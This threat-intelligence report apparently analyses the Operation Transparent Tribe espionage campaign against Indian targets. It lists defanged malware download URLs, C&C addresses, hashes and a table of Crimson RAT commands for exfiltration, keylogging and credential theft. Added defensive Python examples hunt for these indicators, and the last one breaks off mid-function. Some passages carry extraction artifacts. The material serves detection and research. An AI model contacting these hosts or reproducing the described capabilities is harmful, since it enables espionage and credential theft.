AWHO – Defence (sic) and Para-Military Forces Personnel Plots Scheme 2016
Link: hxxp://intribune[.]blogspot[.]com/2015/07/awho-defence-and-para-military-forces.html
Malicious Document Location: hxxp://bbmsync2727[.]com/upd/AWHO-Upcoming-Projects.doc
Document: 1f82e509371c1c29b40b865ba77d091a
Type: Exploit, CVE-2012-0158, Embedded Payload
Dropped: 643d6407cd9a4f1c6d2742f24aed34f5 (MSIL/Crimson Downloader)
C&C: 213.136.87[.]122:10001
Downloaded MSIL/Crimson RAT: 0e3e81f4d2054746f74442075f82a5c5

Figure 14: Article lure ultimately leading to MSIL/Crimson and another malicious website

The AWHO article contains a link to hxxp://cdrfox[.]xyz/ via the "GET CALL DETAIL RECORDS ONLINE" hyperlink. This website is likely operated by the same actor(s) and is capable of delivering a VBS-based malicious document to unsuspecting victims (Fig. 15). Again, there is an obvious India-targeted theme that suggests this malicious website is specifically aimed at that nation. After using the number submission form, victims are directed to another page containing the final link to download a malicious document (Fig. 16).

Figure 15: Landing page for cdrfox[.]xyz
Figure 16: Download File lure containing a document that ultimately leads to the Crimson Downloader

Document Details
Location: hxxp://fileshare[.]attachment[.]biz/?att=1455255900
Document: 18711f1db99f6a6f73f8ab64f563accc
Document Name: "Call Details Record.xls"
Type: VBS Macro
VBS Location: hxxp://afgcloud7[.]com/logs/ssc.mcom
Payload: 3cc848432e0ebe25e4f19effdd92d9c2 (MSIL/Crimson Downloader)
Downloaded MSIL/Crimson RAT: 463565ec38e4d790a89eb592435820e3

Additional payloads were found on the same server but in a different directory:
hxxp://afgcloud7[.]com/com/psp.dlc-bk (hash: 62d254790834f30a79ee79305d9be837, also previously named psp.dlc)
hxxp://afgcloud7[.]com/com/psp.dlc (hash: dd0fc222852f5d12fda2fb66e61b22f6)
hxxp://afgcloud7[.]com/upld/updt.dll (hash: 0ad849121b4656a239e85379948e5f5d)

Both files in the "/com/" directory are malicious droppers that ultimately drop a decoy Excel spreadsheet and a MSIL/Crimson downloader. The spreadsheet is themed towards the Armed Forces Officials Welfare Organization (AFOWO) located in India, while the dropped downloader and downloaded RAT communicate with the same C&C as many of the previously discussed samples. An Excel spreadsheet named "AFOWO Broucher 2016.xls" (hash: 98bdcd97cd536ff6bcb2d39d9a097319) was also found containing a malicious macro that attempts to download a payload from hxxp://afgcloud7[.]com/com/psp.dlc. Additionally, the IP address 50.56.21[.]178 resolved from email.books2day.com (used in the embassy attacks). This IP has also recently resolved to email.afowoblog[.]in. We would not be surprised if an email address using @afowoblog.in was used to send the malicious "AFOWO Broucher 2016.xls" spreadsheet. Additional research related to this domain is provided in the Cluster Analysis section.

62d254790834f30a79ee79305d9be837 / dd0fc222852f5d12fda2fb66e61b22f6:
Dropped Decoy Dropper: 29054da7a1f1fbd0cb3090ee42335e54
Decoy Document: 66cd38a03282b85fceec42394190f420
Payloads: 83a8ce707e625e977d54408ca747fa29 or 2c9cc5a8569ab7d06bb8f8d7cf7dc03a (both MSIL/Crimson Downloader)
C&C: 213.136.87[.]122:10001
Downloaded MSIL/Crimson RAT: 463565ec38e4d790a89eb592435820e3

0ad849121b4656a239e85379948e5f5d:
The payload found in the "/upld/" directory (md5: 0ad849121b4656a239e85379948e5f5d) is the MSIL/Crimson SecApp module, capable of downloading the full MSIL/Crimson RAT and all subsequent modules. Additionally, this payload drops a decoy document (Fig. 17) with the filename "Cv of IMA Chief.docx" (hash: 8e5610d88c7fe08ac13b1c9f8c2c44cc). The decoy document contains information regarding a possible Brigadier General whose last and current position (according to the decoy) is the Chief of International Military Affairs Department, Ministry Defence (sic) of Afghanistan.

Figure 17: Decoy document dropped by 0ad849121b4656a239e85379948e5f5d

Cluster Analysis

In this section we present our research surrounding the use of the MSIL/Crimson implant and the campaigns that are part of Operation Transparent Tribe. Even though the tool may possibly be used by several threat actors, our research indicates that the hundreds of Crimson samples may be clustered into a much smaller set of activity, as described below.

Cluster 1 - Operation Transparent Tribe and More

The first cluster is the largest, with activity from over one hundred samples dating as far back as 2012 (Fig. 18). For this cluster, we started our analysis with the email attacks on the Indian embassies and the fake Indian news blog. The activity surrounding those two events uncovered numerous other samples hosted on attacker-controlled C&C that then led to at least one additional email attack campaign.

On one of the C&Cs we discovered a Python-based RAT (Python/Peppy) whose activity clusters very closely to Operation Transparent Tribe. We have also observed this RAT being downloaded and executed along with MSIL/Crimson by Andromeda downloaders. In addition to Crimson and Peppy, we have observed the usage of Luminosity Link RAT, njRAT, Bezigate, Meterpreter, and several custom downloaders.

Figure 18: Maltego graph of cluster 1 activity (a link to the complete graph is given below)

The attackers responsible for this activity appear to have used a mixture of compromised infrastructure (e.g., sahirlodhi[.]com) and infrastructure owned solely by them (e.g., bbmsync2727[.]com). In many cases, the attackers used common patterns in naming their domains:
• sync in domain name and file name
• Repeated use of bb in domain name or filename, mostly bbm
• Ending second level domain names in four digits

Additionally, this cluster of activity has numerous instances where Contabo GmbH was used for C&C. However, we never used that as the sole item to group activity together under this cluster. Next, we will discuss an additional email attack, the attachment.biz activity, and lastly the afowoblog.in domain, all of which we believe fall into this cluster.

Email campaign using "2016 Pathankot attack" Lure

While researching this activity, we discovered an additional email attack campaign using the 2016 Pathankot attack as a lure (Fig. 19). This attack utilized a URL (hxxp://comdtoscc.attachment[.]biz/?att=1451926252) to deliver a compressed file (md5: f689471d59e779657bc44da308246ac4) containing two MSIL/Crimson payloads using 193.37.152[.]28:9990 as their C&C.
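The three naming habits listed above (sync, bb/bbm, a four-digit suffix on the second-level label) are the kind of weak signal that is useful for pivoting through passive DNS or proxy logs once a cluster is known, but they must never be the sole grouping criterion, which is the same caveat the report makes about Contabo GmbH hosting. The following is an added example written for this page, not Proofpoint's tooling: it accepts IOCs in the report's own defanged hxxp:// and [.] notation, applies the patterns to the registrable label and the file name, and ignores bare IP addresses. The public-suffix handling is a deliberate simplification (one label, or two labels of at most three characters each) rather than a real public-suffix-list lookup, and the input list is constructed from locations quoted in the report plus a few that should not fire.

```python
"""Hunting heuristic for the naming habits listed above (sync, bb/bbm,
four-digit suffix on the second-level label). Added example, not
Proofpoint's tooling; it parses the defanged hxxp:// and [.] notation the
report uses so IOC lines can be fed in as written."""
import re
from urllib.parse import urlsplit

IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
LABEL_PATTERNS = {          # pattern name -> regex applied to the label
    "sync": re.compile(r"sync"),
    "bb": re.compile(r"bb"),
    "four_digits": re.compile(r"\d{4}$"),
}
# The report ties the digit pattern to domain names only; sync/bb also show
# up in file names, so those two are checked against the path's basename.
FILENAME_PATTERNS = {k: v for k, v in LABEL_PATTERNS.items() if k != "four_digits"}


def refang(ioc: str) -> str:
    """Reverse the defanging used in the report so urlsplit can parse it."""
    s = ioc.strip().replace("[.]", ".").replace("[:]", ":")
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)
    return s if "://" in s else "http://" + s


def split_ioc(ioc: str):
    """Return (hostname, filename) from a defanged URL, host, or host:port."""
    parts = urlsplit(refang(ioc))
    host = (parts.hostname or "").lower()
    filename = parts.path.rsplit("/", 1)[-1].lower()
    return host, filename


def second_level_label(host: str) -> str:
    """Label left of the public suffix. Assumption: a suffix is one label,
    or two labels of at most three characters each (co.uk, com.pk); there is
    no public-suffix-list lookup, so treat results for exotic TLDs with care."""
    labels = host.split(".")
    if len(labels) >= 3 and len(labels[-1]) <= 3 and len(labels[-2]) <= 3:
        return labels[-3]
    return labels[-2] if len(labels) >= 2 else host


def naming_indicators(ioc: str) -> set:
    """Names of the patterns that fire for one IOC; empty set for bare IPs."""
    host, filename = split_ioc(ioc)
    if not host or IPV4_RE.fullmatch(host):
        return set()
    label = second_level_label(host)
    hits = {name for name, rx in LABEL_PATTERNS.items() if rx.search(label)}
    hits |= {name for name, rx in FILENAME_PATTERNS.items() if rx.search(filename)}
    return hits


def triage(iocs) -> dict:
    """Map each IOC that fires at least one pattern to its pattern names,
    preserving input order so the output can be diffed against a feed."""
    result = {}
    for ioc in iocs:
        hits = naming_indicators(ioc)
        if hits:
            result[ioc] = hits
    return result


# Constructed input: locations quoted in the report plus entries that should
# not fire, to show the heuristic is selective rather than matching everything.
SAMPLE_IOCS = [
    "hxxp://bbmsync2727[.]com/news/4%20Sikh%20Army%20Officers%20being%20trialed.doc",
    "hxxp://birthdaywisheszone[.]com/pml/army-air-defenceengineers-and-signal.doc",
    "hxxp://afgcloud7[.]com/logs/ssc.mcom",
    "hxxp://sms[.]totalworthy[.]com/intribune.zip",
    "sahirlodhi[.]com",
    "213.136.87[.]122:10001",
]

if __name__ == "__main__":
    for ioc, hits in triage(SAMPLE_IOCS).items():
        print(f"{ioc}: {sorted(hits)}")
```

On the constructed list only the bbmsync2727[.]com location fires, and it fires on all three patterns; the compromised sahirlodhi[.]com host and the Contabo IP produce nothing, which is the point: the heuristic ranks candidates for a human pivot, it does not attribute.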
Figure 19: email campaign using \xe2\x80\x9c2016 Pathankot attack\xe2\x80\x9d as a lure The attackers further increased the believability of their attack by including decoy files with each of the MSIL/Crimson payloads: Sample 1: 65f6143d69cb1246a117a704e9f07fdc Original name: \xe2\x80\x9cCall Record and Tracking Route.scr\xe2\x80\x9d Dropped decoy: 2f821d8c404952495caae99974601e96,Audio file with image (Fig. 20) Decoy name: \xe2\x80\x9cCall Record and Tracking Route.mp3\xe2\x80\x9d https://www.proofpoint.com/sites/default/files/fig-18-separate.png https://en.wikipedia.org/wiki/2016_Pathankot_attack 17 Figure 20: Audio file decoy, likely discussing Pathankot attack Sample 2: 723d85f905588f092edf8691c1095fdb Original name: \xe2\x80\x9cdetail behind the scenes.scr\xe2\x80\x9d Dropped decoy: a523b090e9a7e3868d8d1fde3e1ec57d,PDF (Fig. 21) Decoy name: \xe2\x80\x9cdetail behind the scenes.pdf\xe2\x80\x9d 18 Figure 21: Pathankot attack decoy 19 ATTACHMENT.BIZ domain We discovered additional activity surrounding the attachment.biz domain that is being used to deliver malicious documents and payloads. The observed domains include: \xe2\x80\xa2 fileshare.attachment[.]biz \xe2\x80\xa2 comdtoscc.attachment[.]biz \xe2\x80\xa2 ceengrmes.attachment[.]biz \xe2\x80\xa2 email.attachment[.]biz (no links discovered) All of the domains resolve to the same IP, 91.194.91[.]203 (Contabo GmbH). So far we have detected three separate campaigns, although we\xe2\x80\x99re unsure of the starting point for each of these incidents but are highly confident they exist in this cluster of activity. 
Link 1: hxxp://ceengrmes.attachment[.]biz/?att=1450603943 Payload: 07defabf004c891ae836de91260e6c82, MSIL/Crimson Payload name: Accn Letter.scr C&C: 5.189.143[.]225:11114 Link 2: hxxp://fileshare.attachment[.]biz/?att=1455264091 Payload: 18711f1db99f6a6f73f8ab64f563accc,XLS VBS-downloader * Payload name: Air India Valid Destinations.xls *Same payload as delivered by hxxp://fileshare[.]attachment[.]biz/?att=1455255900 from the attacker\xe2\x80\x99s cdrfox.xyz site Link 3: hxxp://comdtoscc.attachment[.]biz/?att=1453788170 Payload: 45d3130a901b7a763bf8f24a908b1810,compressed archive Payload name: Message.zip Decompressed Payload: 765f0556ed4db467291d48e7d3c24b3b, MSIL/Crimson Decompressed payload name: Message.scr C&C: 193.37.152[.]28:9990 AFOWOBLOG.IN Domain We have uncovered circumstantial evidence indicating that the afowoblog.in domain falls into this cluster of activity. The domain was registered on or near February 24th, 2016 using the email address thefriendsmedia@gmail.com, which is also close to the same day that the \xe2\x80\x9cAFOWO Broucher 2016.xls\xe2\x80\x9d attachment was uploaded to VT. We have detected potentially connected activity as far back as June 2013 using the domain thefriendsmedia[.]com , where it was used as an Andromeda C&C. In one instance (Fig. 22, maltego graph), we observed an Andromeda payload communicate with brooksidebiblefellowship[.]org to retrieve an additional Andromeda payload from lolxone[.]com that then used thefriendsmedia[.]com as its C&C. The original Andromeda also retrieved a Bezigate payload. 20 Figure 22: thefriendsmedia connection to Andromeda, lolxone[.]com, and Bezigate Furthermore, we have observed lolxone[.]com hosting additional Bezigate payloads as well as the Python/Peppy malware as shown in the graph below (Fig. 23). This activity can be further connected to the overall cluster via the Peppy, Bezigate, and Andromeda C&Cs as shown in the complete Maltego graph (Fig. 25). 
21 Figure 23: lolxone[.]com and Andromeda connections to Python/Peppy, Bezigate Cluster 2 - guddyapps/appstertech/sajid Some Crimson SecApp modules we came across did not download the expected RAT or downloader payload when it first communicated to its C&C. For example, sample: 85429d5f2745d813e53b28d3d953d1cd retrieved a downloader from 178.238.228[.]113:7861 . Once the downloader was executed, it then downloaded an XMPP library (md5: fee34da6f30a17e1fcc5a49fd0987169) and the XMPP-based Trojan (md5: d3094c89cad5f8d1ea5f0a7f23f0a2b1) we refer to as Beendoor. Beendoor is a very interesting piece of malware and we were able to gather additional information about this variant's C&C, 178.238.235[.]143. Much like Crimson and Peppy, Beendoor is capable of taking screenshots of the victims desktop. On Beendoor\xe2\x80\x99s C&C we were able to recover a screenshot that appears to have been taken from one of the malware developer\xe2\x80\x99s computer (Fig. 24). In this modified screenshot we are bringing attention to a few key pieces of information: \xe2\x80\xa2 Identical \xe2\x80\x9cAnushka\xe2\x80\x9d image on desktop found on Beendoor C&C and used in Beendoor sample \xe2\x80\xa2 Folder structure similar to that found on the C&C \xe2\x80\xa2 Hardcoded paths found in Beendoor dropper binary (md5: 9b98abb9a9fa714e05d43b08b76c0afa) \xe2\x80\xa2 Same file names used by Beendoor and the XMPP library 22 Figure 24: Screenshot of likely Beendoor developer\xe2\x80\x99s desktop As shown in the figure, it seems likely that the Pakistan-based company Appstertech is somehow connected to the Beendoor malware. Based on the analysis of the folders and files on the Beendoor C&C, we can also conclude that this activity is related to research published by CloudSek late last year. In the Crimson samples that we found connected to Beendoor (Fig. 25), several of them used the same \xe2\x80\x9cBinder\xe2\x80\x9d dropper that we observed in other clusters, including Cluster 1. 
Moreover, the C&C servers for this occurrence of Crimson and Beendoor are both hosted at Contabo GmbH, another similarity with other clusters surrounding the Crimson implant.

Figure 25: Maltego graph of Crimson<->Beendoor cluster

Cluster 3 - “Nadra attack in Mardan” Lure

In addition to the attack using the recent Pathankot attack as a lure, we discovered several samples that may have been used in recent attack campaigns utilizing the December attack in Mardan near a National Database and Registration Authority (Nadra) as a lure. Several samples were uploaded to VT in compressed archives containing Crimson payloads along with possible decoys their respective droppers would have dropped. For example, one of the payloads (md5: 51c57b0366d0b71acf05b4df0afef52f, “NADRA OFC.exe”) was uploaded to VT along with an image (md5: be0b258e6a419b926fe1cfc04f7e575a) that can also be found here: hxxp://i.dawn[.]com/medium/2015/12/56825d6d8f1a5.png, which is linked to by an article about the attack: hxxp://www.dawn[.]com/news/1229406

For this cluster of activity, we’re not currently aware of any droppers and so have decided to cluster it on its own. With that in mind, however, the TTPs for this campaign are nearly identical to the “Pathankot attack lure” campaign in Cluster 1. Unsurprisingly, the C&C utilized in this campaign is hosted at Contabo GmbH. Lastly, the port used in these samples, 11100, is the same port used by some of the samples we have grouped in Cluster 1.

Threat Insight | Operation Transparent Tribe

Cluster 4 - DDNS and Pakistan

The final cluster we would like to discuss includes several samples all using DDNS for their C&C, pointing to IP addresses in Pakistan (according to Whois). The majority of this activity is from 2013.
Based on the slightly different TTPs (purely DDNS usage) and no use of Contabo GmbH, we have clustered this separately from other activity, even though we have observed DDNS usage in Cluster 1 and there is obvious overlap in tool usage. This activity is graphed in Figure 26 and included in the IOCs section.

Figure 26: DDNS and Pakistan IP address Maltego graph

One Cluster to Rule Them All, Nothing Yet to Bind Them...

There are numerous overlaps between the clusters, including usage of the “Binder” dropper, attack lures, and, most obviously, the usage of Contabo GmbH. Unfortunately we lack information regarding some of the found samples as far as how they were used and in what campaigns, and so we have decided not to tie all the activity together. As we continue to research these incidents, we would not be surprised to find additional information linking all clusters together.

Technical Analysis

MSIL/Crimson

Crimson is modular in the sense that additional payloads downloaded by the main RAT module are often utilized to perform functions such as keylogging and browser credential theft. Crimson infections also typically occur in stages. Crimson’s first stage is a downloader component whose primary purpose is to download a more fully featured RAT, typically the Crimson RAT component. The RAT component will then send system information to the C&C, and the C&C will likely respond with additional module payloads. Crimson utilizes a custom TCP protocol for communicating with its C&C (Fig. 27). Some of Crimson’s optionally downloaded modules have no C&C capability and instead rely on the RAT component for information exfiltration.

Figure 27: Crimson custom TCP C&C protocol

Crimson-infected victims may be spied on by their attackers via invasive methods such as their webcam, theft of email from Outlook, and recording of their screen.
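The C&C endpoints and ports quoted for Clusters 1 to 3 above can be turned directly into a hunting check over connection logs. The following is an added example written for this page, not code from the report or from Proofpoint: it refangs the indicators exactly as the report prints them, parses a constructed subset of Zeek conn.log fields, and grades each hit. An exact ip:port or known-address match is high confidence; a Crimson-associated port alone on an outbound flow is only a lead, because ports such as 11100 are not reserved for this malware. The log lines and the RFC 1918 test are the example's own assumptions.

```python
"""Hunt connection logs for the Crimson C&C endpoints this report lists.

Added example, not code from the report. Indicators are copied as printed there
(defanged with "[.]"); the log lines are constructed in Zeek conn.log style.
"""
import ipaddress

# ip:port pairs the report attaches to Crimson payloads (Cluster 1 links, Cluster 2 SecApp)
CRIMSON_C2_ENDPOINTS = {"5.189.143[.]225:11114", "193.37.152[.]28:9990", "178.238.228[.]113:7861"}
# Cluster 1 C&C addresses listed without a port in the IOC appendix
CRIMSON_C2_HOSTS = {"5.189.143[.]225", "5.189.167[.]65", "80.241.221[.]109",
                    "93.104.213[.]217", "193.37.152[.]28", "213.136.87[.]122"}
# Ports the report ties to Crimson samples (11100 is shared by Cluster 1 and Cluster 3)
CRIMSON_PORTS = {11114, 9990, 11100, 7861}
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def refang(indicator):
    """Turn the report's '5.189.143[.]225' back into the form a log will contain."""
    return indicator.replace("[.]", ".")


ENDPOINTS = {refang(e) for e in CRIMSON_C2_ENDPOINTS}
HOSTS = {refang(h) for h in CRIMSON_C2_HOSTS}


def is_internal(ip_text):
    ip = ipaddress.ip_address(ip_text)
    return any(ip in net for net in RFC1918)


def parse_conn_line(line):
    """Seven tab-separated fields (constructed subset of Zeek conn.log):
    ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto"""
    ts, uid, orig_h, orig_p, resp_h, resp_p, proto = line.rstrip("\n").split("\t")
    return {"ts": ts, "uid": uid, "orig_h": orig_h, "orig_p": int(orig_p),
            "resp_h": resp_h, "resp_p": int(resp_p), "proto": proto}


def classify(rec):
    """Return (severity, reason) or None for a parsed flow."""
    if f"{rec['resp_h']}:{rec['resp_p']}" in ENDPOINTS:
        return "high", "exact Crimson C&C ip:port match"
    if rec["resp_h"] in HOSTS:
        return "high", "known Crimson C&C address (any port)"
    if rec["proto"] == "tcp" and rec["resp_p"] in CRIMSON_PORTS and not is_internal(rec["resp_h"]):
        return "low", "Crimson-associated port to an external host; pivot on destination and process"
    return None


def hunt(lines):
    """Scan conn.log lines and return (uid, severity, reason) for every hit, in log order."""
    findings = []
    for line in lines:
        if not line or line.startswith("#"):      # skip Zeek header/comment lines
            continue
        rec = parse_conn_line(line)
        verdict = classify(rec)
        if verdict:
            findings.append((rec["uid"], *verdict))
    return findings


# Constructed sample flows; 203.0.113.0/24 is documentation space, standing in for "some external host".
SAMPLE_CONN_LINES = [
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto",
    "1455270000.000000\tC1a\t10.0.0.15\t49211\t5.189.143.225\t11114\ttcp",
    "1455270005.000000\tC2b\t10.0.0.15\t49212\t93.104.213.217\t443\ttcp",
    "1455270010.000000\tC3c\t10.0.0.22\t49300\t203.0.113.9\t11100\ttcp",
    "1455270015.000000\tC4d\t10.0.0.22\t49301\t10.0.0.1\t11100\ttcp",
    "1455270020.000000\tC5e\t10.0.0.30\t52000\t203.0.113.50\t443\ttcp",
]

if __name__ == "__main__":
    for uid, severity, reason in hunt(SAMPLE_CONN_LINES):
        print(f"{uid}\t{severity}\t{reason}")
```

On the sample, flows C1a and C2b are reported as high and C3c as low; the internal flow on port 11100 and the ordinary HTTPS flow produce nothing. Extending HOSTS with the other clusters' addresses from the IOC appendix is a one-line change.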
Some Crimson RAT variants support at least 40 individual commands; all the individual commands found across the different versions of the RAT we researched are listed and described in Table 1.

Table 1. MSIL/Crimson supported commands

Command   Description
afile     Exfiltrate file to C&C
audio     Download legitimate NAudio library (https://naudio.codeplex.com/) from C&C, save as NAudio.dll (not executed or added to startup). Used to record audio from microphone.
autf      Add extensions to file extensions list. Optionally search for files in extensions list and exfiltrate
autoa     Exfiltrate all files with an extension matching the file extensions list
capcam    Capture still from webcam
camvdo    Continuous capture from webcam (stopped with stops command)
clping    Set runTime to DateTime.Now
clrklg    Stop keylogger and delete keylogs
cnls      Stop upload, download, and screen capture
cscreen   Single screenshot
delt      Delete provided path/file
dirs      Send disk drives
dotnet    Download URLDownload payload, save as dotnetframwork.exe and add to startup via registry
dowf      Retrieve file from C&C
dowr      Retrieve file from C&C and execute
email     Capable of retrieving email account name, number of emails, and exfiltrating emails from Outlook
endpo     Kill process given PID
fbind     Save file from C&C in existing directory with .exe appended to name
file      Exfiltrate file to C&C
filsz     Send file info: CreateTimeUtc, File Size
fldr      List folders in a directory
fles      List files in a directory
ftyp      Add extensions to file extensions list
info      Send PC info (MAC, PC Name, User, LAN IP, OS, AV, missing modules…)
klgs      Sometimes not implemented but command exists (previous versions: enable automatic exfiltration of keylogs)
listf     Search for files with given extension(s)
mesg      Pop up “Alert” box with provided message
msdlf     Click mouse
muspo     Move mouse cursor
obind     Save file from C&C to directory with .exe appended to name
outdwn    Search for specific email attachment with specified name and exfiltrate
passl     Retrieve password logger logs
procl     List processes
runf      Execute command
rupth     Retrieve malware’s run path
savaf     Save file from C&C
scren     Capture screen continuously
scrsz     Set scrSize (utilized by scren and cscreen)
secup     Download “secApp” payload from C&C, add to startup via registry
sndpl     Download “pssApp” from C&C (browser credential stealer) and begin log exfiltration
sndps     Download “pssApp” from C&C (browser credential stealer)
splitr    Split file into provided number of splits; however, we believe that due to programmer error this functionality will not work as expected
stops     Stop screen capture
stsre     Get microphone audio
sysky     Exfiltrate keylogs to C&C
systsk    Update module, likely secApp
thumb     Get 200x150 GIF thumbnail of image
uclntn    Sets RegKey [variable]_ver to provided value, possibly used as a version indicator
udlt      Download “remvUser” payload from C&C, save as msupdate.exe, then execute it
uklog     Download keylogger payload from C&C, save as win_services.exe, then add to startup via registry
updatc    Download controller/client/main RAT, save as servicesdefender.exe, then execute it
updatu “OR” usbwrm    Download USB payload, save as udriver.exe, then add to startup via registry

MSIL/Crimson Module Analysis

As previously mentioned (and shown in the commands table), Crimson relies on additional module payloads to further enrich its feature set. These modules include keylogging, browser credential theft, automatic searching and stealing of files on removable drives, and two different payload update modules. Lastly, there appears to be a module referred to as “remvUser” that we have not been able to locate.

URLDownload

When executed, this module will first check for the existence of a registry key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\last_edate.
If the key does not exist then it will be created by the module and assigned a DateTime.Now string. This key is periodically checked to determine how many days have passed. Once the malware detects that at least 15 days have passed, an HTTP GET request is sent to a hardcoded location to retrieve a text file that should point to another HTTP location containing a final payload. For example, one analyzed sample (md5: 532013750ee3caac93a9972103761233) contained a hardcoded URL: hxxp://sahirlodhi[.]com/usr/api.txt. So far we have observed the attackers modify api.txt twice, first containing a link to hxxp://bbmsync2727[.]com/upd/secure_scan.exe and then hxxp://bbmsync2727[.]com/ccmb/ssm.exe. In the module that we analyzed, the downloader logic was configured to request a file from a hardcoded URL, hxxp://sahirlodhi[.]com/usr/api.txt, which is likely a compromised website. The module expects that another URL will be stored at the previously retrieved URL, which initially we found to be the following: hxxp://bbmsync2727[.]com/upd/secure_scan.exe (md5: e456d6035e41962a4e49345b00393dcd). This payload is a MSIL/Crimson Downloader variant that, when executed, will begin the MSIL/Crimson lifecycle all over again by downloading a new controller/orchestrator.

secApp

The secApp that we analyzed (md5: ccfd8c384558c5a1e09350941faa08ab) contained functionality very similar to the initial downloader; however, the initial beacon sent to the C&C was doupdat rather than updatc, and it was configured to connect to the same hardcoded C&C but on a different port. In addition to supporting the updatc command issued by the C&C, this module also supports the following commands: info, upsecs, and upmain. The info command supports the same functionality that the main RAT module supports, while upsecs and upmain allow the controller to modify the path and application names for both the secApp and mainApp.
Credential Stealer

The pssApp is a password harvesting module that initially appears to support retrieving saved credentials from the Chrome, Firefox, and Opera browsers. Successfully harvested credentials are stored in a hardcoded location such as %APPDATA%\Roaming\chrome\chrome_update. If no credentials are found, the credential log will simply contain “Not Found> > <”, while an example of successfully stolen credentials is shown in Figure 28. In our very limited testing, this module was not able to retrieve passwords from Opera 35.0.2066.68 or Firefox 44.0.2 but was successful with Chrome 48.0.2564.116 m.

Figure 28: Successfully harvested credentials by the pssApp module

Some samples (md5: 8a991eec65bd90f12450ee9dac0f286a) also appear to support the retrieval of credentials from Windows Live, FileZilla, Vitalwerks’ Dynamic Update Client (DUC), and Paltalk.

Keylogger

The keylogger module is a basic keylogger that stores keylogs in a plain text file (Fig. 29) in a hardcoded location. The module that we analyzed (md5: f18172d7bb8b98246cb3dbb0e9144731) was hardcoded to store keylogs in a file named “nvidia” in the following location: %APPDATA%\NVIDIA\.

Figure 29: Data stored in “nvidia” keylog

USB Module

If either the updatu or usbwrm command is issued, a USB drive module may be downloaded and set to execute on next startup. In the payload that we analyzed, the only purpose appears to be to search for potentially interesting files in removable storage and copy them to the local disk, likely so they may be exfiltrated at a later time. This payload may be configured with a set of file extensions (Fig. 30) that are used to search for matching files on any USB drives. If any files are found, they are copied to a configured directory on the local disk, while a running list of copied files is stored in a separate log so duplicate files are not copied.
The anti-duplication method, however, only utilizes filenames, so in the event that an already copied file is later modified, a newer copy will not be saved for exfiltration. Although the name of one of the commands that may be used to download this payload (usbwrm) suggests “worm” functionality, that does not appear to be the case.

remvUser

During our research, we were not able to locate this module, so we are not sure what its functionality is. A best guess is that it could be a clean-up/implant removal utility.

Python/Peppy

Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates with its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates with its C&C, the keylogging and exfiltration of files using configurable search parameters begins (Fig. 30). Files are exfiltrated using HTTP POST requests (Fig. 31).

Figure 30: Peppy configurable search parameters

Figure 31: Peppy exfiltrating files

In addition to keylogging and the exfiltration of files, Peppy is also capable of accepting commands from its C&C to update itself, disable itself, exfiltrate a specific file, uninstall itself, execute a shell command, take screenshots, spawn a reverse shell, and download a remote file and execute it. In addition, we have discovered a simple Python-based downloader (md5: 82719f0f6237d3efb9dd67d95f842013) that was possibly written by the author(s) of Peppy, based on code overlap between the downloader’s functionality and Peppy’s download_exec routine (Fig. 32, 33).
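The module analysis above names several host artifacts that survive a Crimson infection: the last_edate value the URLDownload module writes and polls for its 15-day delay, the executable names the RAT registers at startup via the registry, and the fixed log paths used by the keylogger and the pssApp credential stealer. The following triage routine is an added example written for this page, not code from the report or from Proofpoint. It works on already-collected data (registry values, Run-key entries, file contents) so it runs offline; the sample host data is constructed, and the two DateTime.Now renderings it tries are an assumption about how the .NET string was written. The 15-day computation is the practical point: a sandbox run never reaches the fetch, so on a live host the marker's age tells the responder whether the second stage has already been retrieved.

```python
"""Host triage for the MSIL/Crimson artifacts described above (added example, not report code).

Inputs are already-collected data so the routine runs offline; the sample inputs
below are constructed.
"""
from datetime import datetime

# URLDownload module: HKCU value written on first run, polled for the 15-day delay.
LAST_EDATE_KEY = r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion"
LAST_EDATE_VALUE = "last_edate"
DORMANCY_DAYS = 15
# Assumed renderings of a .NET DateTime.Now string (en-US default, then ISO-like).
DATE_FORMATS = ("%m/%d/%Y %I:%M:%S %p", "%Y-%m-%d %H:%M:%S")
# File names the report says RAT commands write and register at startup via the registry.
PERSISTENCE_NAMES = {"dotnetframwork.exe", "win_services.exe", "servicesdefender.exe", "udriver.exe"}
# Log locations the report gives for the keylogger and the pssApp credential stealer.
LOG_PATHS = {
    r"%APPDATA%\NVIDIA\nvidia": "keylogger log",
    r"%APPDATA%\Roaming\chrome\chrome_update": "pssApp credential log",
}
PSSAPP_EMPTY_MARKER = b"Not Found> > <"


def parse_dotnet_datetime(text):
    """Parse the stored DateTime.Now string; None when no known rendering matches."""
    for fmt in DATE_FORMATS:
        try:
            return datetime.strptime(text.strip(), fmt)
        except ValueError:
            continue
    return None


def exe_from_command(command):
    """Executable path from a Run-key command line, with or without quotes."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.index('"', 1)]
    return command.split(" ", 1)[0]


def triage(registry, run_entries, files, appdata, now):
    """registry: {(key, value_name): data}; run_entries: {value_name: command};
    files: {path: content bytes}; appdata: the user's expanded %APPDATA%.
    Returns a list of (severity, message)."""
    findings = []

    marker = registry.get((LAST_EDATE_KEY, LAST_EDATE_VALUE))
    if marker is not None:
        first_run = parse_dotnet_datetime(marker)
        if first_run is None:
            findings.append(("medium", f"{LAST_EDATE_VALUE} present but not parseable: {marker!r}"))
        else:
            days = (now - first_run).days
            if days >= DORMANCY_DAYS:
                state = "fetch window OPEN: look for the api.txt retrieval and the downloaded payload"
            else:
                state = f"dormant, {DORMANCY_DAYS - days} day(s) until the api.txt fetch"
            findings.append(("high", f"URLDownload marker set {days} day(s) ago; {state}"))

    for name, command in run_entries.items():
        base = exe_from_command(command).rsplit("\\", 1)[-1].lower()
        if base in PERSISTENCE_NAMES:
            findings.append(("high", f"Run value {name!r} starts {base} (Crimson module file name)"))

    for path, content in files.items():
        for template, what in LOG_PATHS.items():
            if path.lower() == template.replace("%APPDATA%", appdata).lower():
                if content.strip() == PSSAPP_EMPTY_MARKER:
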